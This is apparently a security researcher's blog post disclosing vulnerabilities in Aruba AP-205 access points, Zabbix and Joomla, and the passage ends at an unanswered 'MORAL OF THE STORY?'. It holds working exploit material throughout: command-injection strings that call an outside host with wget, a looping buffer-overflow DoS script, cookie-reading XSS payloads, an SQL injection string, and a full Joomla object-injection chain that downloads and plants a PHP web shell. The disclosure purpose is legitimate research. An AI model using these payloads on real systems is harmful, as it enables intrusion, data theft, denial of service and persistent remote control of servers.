Aruba Networks AP-205 (Multiple Vulnerabilities)

It’s been a while since I put out a new blog post, so I thought I’d share some insights into some older vulnerabilities I discovered while hacking on Aruba’s AP-205 wifi routers. Aruba was nice enough to ship out 2 FREE AP-205 devices to test and I ended up finding several vulnerabilities which paid out a total of ~$1,500. Not too shabby and I got to keep the routers after which was super cool of them! I’m releasing the technical details here purely for educational use. All of the vulnerabilities noted here have now been fixed. Enjoy! -1N3

Aruba AP-205 Remote Command Injection Vulnerability


Company: Aruba Networks
Device Model: AP-205
Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
Researcher: [email protected]
Bounty: $750.00

Aruba Networks AP-205 wireless routers suffer from remote command injection vulnerability in the WISPr input fields. This can be exploited by an attacker with authenticated access to the AP by crafting special escape character strings followed by standard linux commands. The Operator name, Location name and SSID/Zone fields are all vulnerable as seen by the below output. A permanent web backdoor could also be leveraged with time using the wget -O options to remotely grab a backdoor script from the attackers server and place locally in the web directory. PoC BLIND TIME BASED COMMAND EXECUTION:

wget http://192.168.1.145/test?`sleep 1`
RESULT: 1+ second delay in response time

wget http://192.168.1.145/test?`sleep 5`
RESULT: 5+ second delay in response time

wget http://192.168.1.145/test?`sleep 10`
RESULT: 10+ second delay in response time

REMOTE CONFIRMATION COMMAND EXECUTION:

; wget http://192.168.1.145/?`whoami`?`uname`?`pwd`
RESULT:
==> /var/log/apache2/crowdshield_access.log <==
192.168.1.148 - - [12/Aug/2015:19:56:09 -0400] "GET /?root?Linux?/aruba/bin HTTP/1.1" 200 7345 "-" "Wget"
192.168.1.148 - - [12/Aug/2015:19:56:09 -0400] "GET /?root?Linux?/aruba/bin, HTTP/1.1" 200 7345 "-" "Wget"
192.168.1.148 - - [12/Aug/2015:19:56:09 -0400] "GET /?root?Linux?/aruba/bin HTTP/1.1" 200 7345 "-" "Wget"

Aruba AP-205 Buffer Overflow Exploit (Memory Dislosure & DoS)


Company: Aruba Networks
Device Model: AP-205
Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
Researcher: [email protected]
Bounty: $150.00

The Aruba Networks AP-205 series is prone to a remote buffer overflow vulnerability because it fails to bounds-check user supplied input before copying it into an insufficiently sized memory buffer. Writing outside the bounds of a block of allocated memory results in a memory leak of sensitive details, denial of service and could lead to remote code execution. HTTP Request

HEAD / <INJECT LONG STRING UP TO 80900 BYTES HERE>
Host: instant.arubanetworks.com

Exploit Code PoC

#!/bin/bash
# Aruba Networks AP-205 Buffer Overflow Vulnerability
# Company: Aruba Networks
# Device Model: AP-205
# Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
# Researcher: 1N3 @ https://xerosecurity.com
# Date: 8/10/2015
#
# The Aruba Networks AP-205 series is prone to a remote buffer overflow
# vulnerability because it fails to bounds-check user-supplied input
# before copying it into an insufficiently sized memory buffer. Writing
# outside the bounds of a block of allocated memory results in a memory
# leak of sensitive details, denial of service and could lead to remote
# code execution.
#

TARGET="$1"

if [ -z $TARGET ]; then
echo "+ -- --=[Aruba Networks AP-205 Series BoF PoC by 1N3"
echo "+ -- --=[http://xerosecurity.com"
echo "+ -- --=[Usage: aruba_ap205_bof_poc "
echo ""
exit
fi

rm -f /tmp/buf
echo "HEAD / " `perl -e 'print "1"x80900'` > /tmp/buf
echo "Host: $TARGET" >> /tmp/buf
echo "" >> /tmp/buf
echo "Sending exploit..."
# cat /tmp/buf #DEBUG ONLY

for a in {1..1000};
do
cat /tmp/buf | ncat --ssl $TARGET 4343;
done

rm -f /tmp/buf

Screenshots
PoC Video

Walled Garden Stored DOM XSS


Company: Aruba Networks
Device Model: AP-205
Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
Researcher: [email protected]
Bounty: $150.00

Aruba Networks AP-205 wireless routers Walled Garden feature suffers from a stored DOM XSS vulnerability. Bug URL
https://192.168.1.148:4343/#home Affected Parameter
whitelist & blacklist input form fields Payload
“><iframe onload=alert(document.cookie)>

Captive Portal Stored DOM XSS


Company: Aruba Networks
Device Model: AP-205
Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
Researcher: [email protected]
Bounty: $150.00

Aruba Networks AP-205 wireless routers Captive Portal function suffers from a stored DOM XSS vulnerability. Bug URL
https://192.168.1.148:4343/#home Affected Parameter
title, welcome text and body text Payload
<iframe onload=prompt(1)> NOTE: This seems to only impact potential wifi guests connecting to the captive portal and may be intended functionality of the device.

DHCP Server Options Stored DOM XSS


Company: Aruba Networks
Device Model: AP-205
Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
Researcher: [email protected]
Bounty: $150.00

Aruba Networks AP-205 wireless routers DHCP Server Options function suffers from a stored DOM XSS vulnerability. Bug URL https://192.168.1.148:4343/#home Affected Parameter
vpn-scope-dhcp-option-valueX Payload
“><iframe onload=alert(document.cookie)></iframe>

SNMP Users Stored DOM XSS


Company: Aruba Networks
Device Model: AP-205
Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
Researcher: [email protected]
Bounty: $150.00

Aruba Networks AP-205 wireless routers SNMP Users function suffers from a stored DOM XSS vulnerability. Bug URL
https://192.168.1.148:4343/#home Affected Parameter
snmp-username Payload
<iframe onmouseover=prompt(1)>

Enterprise Domains Stored DOM XSS


Company: Aruba Networks
Device Model: AP-205
Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
Researcher: [email protected]
Bounty: $150.00

Aruba Networks AP-205 wireless routers Enterprise Domains function suffers from a stored DOM XSS vulnerability. Bug URL
https://192.168.1.148:4343/#home Affected Parameter
domain-name input field Payload
<img src=x onmouseover=alert(1)>

Zabbix 2.2.x, 3.0.x SQL Injection/RCE 0day Vulnerability

==========================================
Title: Zabbix 3.0.3 SQL Injection Vulnerability
Product: Zabbix
Vulnerable Version(s): 2.2.x, 3.0.x
Fixed Version: 3.0.4
Homepage: http://www.zabbix.com
Patch link: https://support.zabbix.com/browse/ZBX-11023
Credit: [email protected]
==========================================
 
 
Vendor Description:
=====================
Zabbix is an open source availability and performance monitoring solution.
 
 
Vulnerability Overview:
=====================
Zabbix 2.2.x, 3.0.x and trunk suffers from a remote SQL injection vulnerability due to a failure to sanitize input in 
the toggle_ids array in the latest.php page.
 
 
Business Impact:
=====================
By exploiting this SQL injection vulnerability, an authenticated attacker (or guest user) is able to gain full access 
to the database. This would allow an attacker to escalate their privileges to a power user, compromise the database, 
or execute commands on the underlying database operating system.
 
Because of the functionalities Zabbix offers, an attacker with admin privileges (depending on the configuration) can 
execute arbitrary OS commands on the configured Zabbix hosts and server. This results in a severe impact to the 
monitored infrastructure.
 
Although the attacker needs to be authenticated in general, the system could also be at risk if the adversary has no 
user account. Zabbix offers a guest mode which provides a low privileged default account for users without password. 
If this guest mode is enabled, the SQL injection vulnerability can be exploited unauthenticated.
 
 
Proof of Concept:
=====================
 
latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1
 
Result:
SQL (0.000361): INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (88, 1, 
'web.latest.toggle', '1', 2, 15385); select * from users where (1=1)
latest.php:746 → require_once() → CProfile::flush() → CProfile::insertDB() → DBexecute() in /home/sasha/zabbix-
svn/branches/2.2/frontends/php/include/profiles.inc.php:185
 
 
Disclosure Timeline:
=====================
 
7/18/2016 - Reported vulnerability to Zabbix
7/21/2016 - Zabbix responded with permission to file CVE and to disclose after a patch is made public
7/22/2016 - Zabbix released patch for vulnerability
8/3/2016 - CVE details submitted
8/11/2016 - Vulnerability details disclosed

Exploiting Joomla Remote Code Execution The Hard Way!


After hearing about the latest Jooma RCE vulnerability which affects Joomla 1.5 – 3.4.5, I decided to do some research to try to understand how this vulnerability actually works. After many failed attempts, lots of confusion and frustration, I beat the urge to give up and was finally able to setup a test VM and exploit the vulnerability using a manual/custom approach (no pre-built exploits). My results are below for educational purposes only.

WHAT’S REQUIRED?

  1. A vulnerable version of Joomla from 1.5.0 to 3.4.5
  2. A vulnerable version of PHP before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13.

INJECTING SESSION PAYLOAD

REQUEST #1:

GET /joomla/ HTTP/1.1
Host: 192.168.1.100
USER-AGENT: YHWEX}__YHWEXYHWEX|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:71:"eval(base64_decode($_SERVER['HTTP_YHWEX']));JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}ýýý
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

RAW PAYLOAD:

s:71:"eval(base64_decode($_SERVER['HTTP_YHWEX']));JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}ýýý

PAYLOAD ANALYSIS:

  1. s:71 value specifies length of payload
  2. eval(base64_decode($_SERVER[‘HTTP_YHWEX’])); – executes base64 encoded PHP commands sent to the HTTP_YHWEX header
  3. ýýý – UTF-8 characters required to truncate input in session table

RESPONSE #1:

HTTP/1.1 200 OK
Date: Wed, 23 Dec 2015 14:57:52 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.13
Set-Cookie: 75bc5a9af0cdeadbe58f55e3d9fe15ab=464rb7iho63i5goftgedr1q936; path=/; HttpOnly
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 23 Dec 2015 14:57:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6167
Content-Type: text/html; charset=utf-8

* The important thing here is the session cookie value. This is required to retrieve our session in order to execute our payload:

Set-Cookie: 75bc5a9af0cdeadbe58f55e3d9fe15ab=464rb7iho63i5goftgedr1q936; path=/; HttpOnly

BLIND EXECUTION OF SESSION PAYLOAD

REQUEST #2:

GET /joomla/ HTTP/1.1
Host: 192.168.1.100
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: 75bc5a9af0cdeadbe58f55e3d9fe15ab=464rb7iho63i5goftgedr1q936;
YHWEX: c3lzdGVtKCJ3Z2V0IGh0dHA6Ly8xOTIuMTY4LjEuMTQ1Ly50ZXN0aW5nL2NtZC50eHQgLU8gL3Zhci93d3cvam9vbWxhL2NtZC5waHAiKTs=
Content-Type: text/html
Content-Length: 0

* Notice the addition of the session cookie and custom HTTP header with our base64 encoded PHP payload PHP PAYLOAD

Cookie: 75bc5a9af0cdeadbe58f55e3d9fe15ab=464rb7iho63i5goftgedr1q936;
YHWEX: c3lzdGVtKCJ3Z2V0IGh0dHA6Ly8xOTIuMTY4LjEuMTQ1Ly50ZXN0aW5nL2NtZC50eHQgLU8gL3Zhci93d3cvam9vbWxhL2NtZC5waHAiKTs=

BASE64 DECODED PAYLOAD:

system("wget http://192.168.1.145/.testing/cmd.txt -O /var/www/joomla/cmd.php");

CMD.PHP RAW CODE:

< FORM METHOD="GET" NAME="myform" ACTION="">
< INPUT TYPE="text" NAME="cmd">
< INPUT TYPE="submit" VALUE="Send">
< /FORM>
< ?
if($_GET['cmd']) {
  system($_GET['cmd']);
  }
? >

COMMAND EXECUTION

REQUEST #3:

GET /joomla/cmd.php?cmd=ls+-lh HTTP/1.1
Host: 192.168.1.100
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: 75bc5a9af0cdeadbe58f55e3d9fe15ab=lm3tc59u78esl0fq93cn130np2;
YHWEX: c3lzdGVtKCdlY2hvICc8P3BocCBzeXN0ZW0oJF9HRVRbY21kXSk7ID8+JyA+IC92YXIvd3d3L2pvb21sYS9jbWQucGhwJyk7
Content-Type: text/html
Content-Length: 0

RESPONSE #3:

HTTP/1.1 200 OK
Date: Wed, 23 Dec 2015 14:59:01 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.13
Vary: Accept-Encoding
Content-Length: 1800
Content-Type: text/html

< HTML>< BODY>
< FORM METHOD="GET" NAME="myform" ACTION="">
< INPUT TYPE="text" NAME="cmd">
< INPUT TYPE="submit" VALUE="Send">
< /FORM>
total 128K
-rwxrwxrwx  1 www-data www-data  18K Oct 22 05:48 LICENSE.txt
-rwxrwxrwx  1 www-data www-data 4.2K Oct 22 05:48 README.txt
drwxrwxrwx 10 www-data www-data 4.0K Oct 22 05:48 administrator
drwxrwxrwx  2 www-data www-data 4.0K Oct 22 05:48 bin
drwxrwxrwx  2 www-data www-data 4.0K Oct 22 05:48 cache
drwxrwxrwx  2 www-data www-data 4.0K Oct 22 05:48 cli
-rw-r--r--  1 www-data www-data  345 Aug 10 01:57 cmd.php
drwxrwxrwx 16 www-data www-data 4.0K Oct 22 05:48 components
-rwxrwxrwx  1 www-data www-data 1.8K Dec 17 10:53 configuration.php
-rwxrwxrwx  1 www-data www-data 2.9K Oct 22 05:48 htaccess.txt
drwxrwxrwx  5 www-data www-data 4.0K Oct 22 05:48 images
drwxrwxrwx  2 www-data www-data 4.0K Oct 22 05:48 includes
-rwxrwxrwx  1 www-data www-data 1.2K Dec 17 11:13 index.php
-rw-r--r--  1 www-data www-data  106 Dec 23 20:29 joomla_rce.sh
-rwxrwxrwx  1 root     root       94 Dec 22 19:33 joomlatest.php
drwxrwxrwx  4 www-data www-data 4.0K Oct 22 05:48 language
drwxrwxrwx  5 www-data www-data 4.0K Oct 22 05:48 layouts
drwxrwxrwx 11 www-data www-data 4.0K Oct 22 05:48 libraries
drwxrwxrwx  2 www-data www-data 4.0K Dec 22 19:38 logs
drwxrwxrwx 18 www-data www-data 4.0K Oct 22 05:48 media
drwxrwxrwx 27 www-data www-data 4.0K Oct 22 05:48 modules
drwxrwxrwx 14 www-data www-data 4.0K Oct 22 05:48 plugins
-rwxrwxrwx  1 www-data www-data  842 Oct 22 05:48 robots.txt
drwxrwxrwx  5 www-data www-data 4.0K Oct 22 05:48 templates
drwxrwxrwx  2 www-data www-data 4.0K Oct 22 05:48 tmp
-rwxrwxrwx  1 www-data www-data 1.7K Oct 22 05:48 web.config.txt
-rw-r--r--  1 www-data www-data 1.5K Oct  7 05:17 weevely_shell.php

MORAL OF THE STORY?